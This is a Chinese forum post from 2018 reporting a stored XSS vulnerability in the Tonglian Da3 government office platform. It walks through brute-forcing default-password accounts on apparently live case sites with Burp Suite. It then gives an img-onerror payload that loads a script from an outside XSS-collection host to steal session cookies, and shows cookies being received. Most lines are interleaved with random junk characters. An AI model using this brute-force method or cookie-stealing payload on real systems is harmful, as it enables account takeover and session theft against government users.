* x( y$ U- } M, A# w9 G& e 2 F' \- e7 A! a( A( m' m4 O
同联Da3协同办公平台后台通用储存型xss漏洞1 V' N2 A5 X* ~3 Q% y; T+ x6 Z
/ R4 J! g. a# M8 \. _% r & X! w. N; c5 x% J
平台简介:' `/ A2 p6 U d* @; c5 q( R- B
; D# v2 G) S7 l6 W* G
" N$ F0 [8 y- C
( }$ ~5 X) H) p7 U: r
- N2 r: |9 N& F c: }; W
& z% G8 U! i# k 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
" K: S5 t4 K1 k6 W6 ]
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
0 `3 O& q/ t/ F' u: G' J同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!1 H2 m8 _- J* D5 t9 _
& z6 v& g' |; y: a2 G
8 | n* f; m6 a2 J
1 D' F6 x1 e: |) n. R0 E o
& E2 I- P/ ^: j: G$ t
/ w+ [/ u2 m8 ^' T: I b3 O9 m 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:9 C S; y5 e' n2 i! Z$ g# t
1 Y5 m5 n1 E0 s) E3 P+ ^+ d/ ?& r 8 m/ R; P: E6 R7 I3 ?
$ ]4 s7 F+ F3 K3 n2 p9 c
' f2 U' n( R% w3 ^
% ^/ f9 ^/ k1 a: {8 f
http://1.1.1.1:7197/cap-aco/#(案例2-)
4 Q- d/ A. M, m0 K) |4 Y
1 K( V* c" T8 V7 A2 f
. j' r3 X; d; a O; Q: S http://www.XXOO.com (案例1-官网网站)4 ^3 |2 t$ |6 Z' ]9 m
- S# ~5 \! d4 i
% F u9 h: d4 O9 `
漏洞详情:
1 V. V' }/ x* B$ y2 V5 ]" d1 e
' k: U9 N/ {* x1 Z) b' l! a. k! ] & M: X+ d, Q! F k0 @/ h1 |4 R1 y4 p
案例一、
9 b$ G' D0 B5 H n" d' R4 \
9 T1 M5 p4 e& m. A' i% P1 I
3 I$ D2 |2 Q5 x# N
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
* C( P- T7 N/ c+ ^) W: x5 m6 h* t+ }; g
. f9 j8 Y5 a5 P" ^5 j; U# w 6 r# A' ^0 d- T$ ?6 a7 H: f
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
/ o. l0 ~% H2 T0 I) X. F9 r
3 V6 G- ?* }6 N
0 \: h5 s! a' M% V8 W , \$ T* F! d+ D+ f
, M' S4 r9 I- d, I6 i% c% S
( O$ M: R7 |$ M/ V3 [; Z3 S
4 l4 o1 i# Y' W- k8 H! V) M
& P( d% m0 n$ B; G& x
& t' ]6 h- D, e* X ^
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
2 b+ I P6 `! d0 K) h$ e2 A& d2 M
! j! U3 m6 ]% M6 b7 h0 {& D: a
+ ?; E- ?- o: f6 j
9 t( i: k- x e; l$ \% l( W: w t
$ T$ [" ?3 }8 B$ Z% ~$ I) X % h: |8 e( }' g2 F
% u: m3 M# P! b( n; M0 j# }9 b5 r
@; Q$ F/ M% e' R 1 L% F8 d9 u" k1 q2 m
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
! w: ` l* _0 P" h3 r8 \$ |. N
( ?0 d: j1 o: N- l1 L
& T$ s9 U2 o7 g: _ h. j% [ E
7 n' E. p5 n5 o' ~
0 g& y) j; w. Z; Q: e
. K% G% m0 |$ g9 O+ c <img src=x
, ?/ b$ ?4 B- s& Wonerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: , N8 `8 i, `6 k- i
# J7 v, p. K R4 v; r8 N, G 5 H; u {. Z6 n3 |, I8 B
9 l0 [+ k W: {# s: d1 s* S
& w, s$ e5 ]4 Y# d. b" {
3 ~, {! m3 T4 \0 b
然后发送,接收cookie如图:
& v0 F6 {+ u4 f: }$ m1 d
: Q2 ^2 I. ?* h) J8 g: F4 l8 O
, {+ D" Q) W' j4 O9 P 6 w# w: }, v# K' R- I+ y
; `" W0 x/ b( d! j0 a' u& ] " h! D. l# N+ p
% n. s) {! k6 V6 t# Z
4 c l5 {4 \) \) C' p
1 Z% e# n) i- c# q1 X
3 E( W( o8 q' l5 Q2 P
# |6 \9 ^6 m- C) `
6 c/ m" d6 i, |. G+ Z2 I* v9 U
# [5 a$ f( H" r" K+ z8 l
9 K) g( l# g. M+ }. {! w
+ B2 k7 H2 p; l' _/ ]" h
7 P' f: w8 v! Y! V* g5 k& i; D
, a4 j& O! }3 o5 v3 D 1 u% n/ e& V: D7 g7 c9 W- U" `
2 A( P, F: ?2 [; N
# m, _; D0 J5 Q. u0 M7 ^4 R5 [* k
$ T- B) o# N7 @+ A v1 n7 F7 |
5 [$ f$ H4 a4 h; j) W
* X8 b/ z0 Z& B8 z4 V8 Z9 x
+ e' F( B+ V) R
案例2、 8 `1 Q, h8 J! a
! x, V" q; L5 J J! i. ^
) t, [' |8 F2 q" S$ I3 E
前面步骤都一样,下面看效果图:
! N' U; V4 W5 \$ J, g4 V
( @6 z0 O, h" D; S 4 q" ]$ j9 ~: [3 B4 m: \, D
* O* Y7 V) g$ T; z) L5 j
5 @+ L" e: t Z d+ V) b6 d+ l( K7 S( ^
; n1 a8 u2 w$ \% t/ u
' y4 G4 o# b5 P; v: F/ v9 e
0 _: U! U4 U$ L3 D
, g9 }: O' N+ y" R; H
- z) |: o8 M* j+ y' b1 g9 R9 w
B9 v1 g: V" u: W" M7 v8 h
' y" `# ]2 s3 F+ f
4 u* b& x: E" I6 I* g% R' g& S
) e) Z0 M$ V+ T# e- t
, v2 T! t4 ~1 e% \% E: y+ M8 a
2 M0 k: N7 n8 F" \) ?' F4 q6 {
3 n( O% E/ Q! V1 P* U / x4 ] ~: X* y9 Q4 M; Q/ J1 t# O
- Q, _) A+ U4 c* w7 _5 b+ F
) e# q' g" |6 x; y5 ]! @: l* F% n % w, G) F. K/ c
0 `% ^, x2 Z2 V4 n # C5 l1 m3 L' y/ p/ ]3 J
( x* r+ ~" Q% M) m6 j( g( [8 W
6 p& H- l8 y _5 `: `+ v1 g2 ^
/ s1 k9 k3 V- c5 r8 p3 R* _: W
# K" j) M+ v- D6 V* d8 V, }
+ |1 d7 p- R, H! [/ i
发表于 2018-10-20 20:14:15
收藏
支持
反对